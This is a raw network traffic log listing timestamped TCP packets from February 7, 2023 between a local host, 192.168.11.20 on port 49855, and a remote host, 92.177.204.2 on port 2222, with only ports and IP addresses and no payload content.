Feb 7, 2023 18:30:30.687998056 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.688224077 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.688266039 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.688479900 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.688657045 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.739049911 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.739064932 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.739296913 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.739348888 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.739397049 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.739566088 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.739588022 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.739600897 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.739736080 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.739751101 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.739803076 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.739854097 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.739893913 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.739893913 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.739981890 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.740037918 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.740048885 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.740151882 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.740325928 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.740325928 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.740454912 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.740564108 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.740577936 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.740588903 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.740791082 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.740933895 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.741087914 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.741101980 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.741472960 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.741620064 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.790564060 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.790671110 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.790680885 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.790817976 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.790836096 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.790937901 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.790947914 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.791148901 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.791158915 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.791166067 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.791187048 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.791234016 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.791248083 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.791295052 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.791469097 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.791510105 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.791520119 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.791570902 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.791636944 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.791647911 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.791647911 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.791822910 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.791840076 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.792001963 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.792103052 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.792143106 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.792155981 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.792470932 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.792639017 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.792649984 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.792658091 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.792834044 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.792932987 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.793023109 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.793143034 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.793191910 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.793191910 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.793601990 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.793773890 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.842180014 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.842235088 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.842478037 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.842508078 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.842611074 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.842660904 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.842756987 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.842816114 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.842845917 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.842963934 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843004942 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843044996 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843183041 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.843216896 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843259096 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843297958 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843338013 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843359947 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.843377113 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843415022 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843421936 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.843453884 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843493938 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843493938 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.843535900 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843643904 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843683958 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843687057 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.843687057 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.843791008 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843810081 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.843832970 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.843875885 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.843938112 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.843938112 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.844109058 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844109058 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.844150066 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844188929 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844227076 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844265938 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844275951 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.844322920 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844358921 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.844460011 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.844621897 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.844623089 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844666958 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844706059 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844712973 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.844712973 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.844746113 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.844815969 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.844969988 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.845081091 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.845123053 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.845160961 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.845320940 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.845407009 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.845482111 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.894150019 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.894372940 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.894500971 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.894694090 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.895189047 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.895215988 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.895490885 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.895591021 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.895617962 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.895896912 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.895944118 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.895992994 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.896014929 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.896042109 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.896060944 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.896337986 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.896580935 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.896605968 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.896763086 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.896934986 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.897082090 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.897105932 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.897270918 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.897440910 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.897609949 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.897634029 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.897778034 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.897949934 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.898116112 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.898140907 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.898160934 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.898180008 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.898446083 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.898602009 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.898626089 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.898633003 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.898646116 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.898962975 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.899074078 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.899095058 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.899318933 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.899491072 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.899600029 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.899626017 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.900002956 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.900104046 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.900130033 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.900150061 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.900167942 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.900176048 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.900187969 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.900413036 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.900571108 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.900623083 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.900648117 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.901021957 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.901125908 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.901129007 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.901155949 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.901407957 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.901566982 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.901652098 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.901679039 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.901906013 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.902019978 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.902046919 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.902066946 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.902081013 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.902333021 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.902420044 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.902431965 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.902443886 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.902545929 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.902565956 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.902646065 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.902724028 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.902724028 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.902765989 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.903083086 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.903188944 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.903287888 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.903338909 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.903558969 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.903584957 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.903609991 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.903629065 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.903775930 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.903944969 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.904045105 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.904066086 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.904084921 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.904287100 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.904455900 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.904571056 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.904592037 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.904827118 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.904998064 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.905071974 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.905092001 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.905109882 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.905339956 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.905589104 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.905612946 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.905632019 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.905925035 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.905975103 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.906022072 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.906068087 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.906092882 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.906111956 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.906131029 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.906148911 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.906192064 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.906368017 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.906533957 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.906550884 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.907022953 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.945626020 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.945844889 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.945934057 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.946008921 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.946255922 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.946619034 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.946645975 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.946759939 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.946917057 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.946929932 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.946976900 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.947092056 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.947117090 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.947148085 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.947316885 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.947402954 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.947546005 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.947570086 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.947588921 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.947731972 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.947904110 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.948020935 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.948048115 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.948172092 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.948348999 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.948519945 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.948540926 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.948729992 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.948904991 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.949014902 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.949038982 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.949120045 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.949394941 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.949506044 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.949563026 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.949793100 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.949985981 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.950010061 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.950383902 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.950467110 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.950476885 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.950484991 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.950555086 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.950726986 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.950898886 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.950997114 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.951332092 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.951524973 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.951535940 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.951806068 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.951970100 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.952001095 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.952012062 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.952117920 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.952271938 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.952369928 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.952429056 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.952449083 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.952456951 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.952476025 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.952903986 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.952969074 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.952976942 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.952985048 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.953016996 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.953174114 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.953344107 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.953356028 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.953392029 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.953560114 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.953608036 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.953618050 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.953730106 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.953902006 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.953978062 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.953988075 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.953995943 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:30.954072952 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.954243898 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.954243898 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.954412937 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:30.954596043 CET	2222	49855	92.177.204.2	192.168.11.20
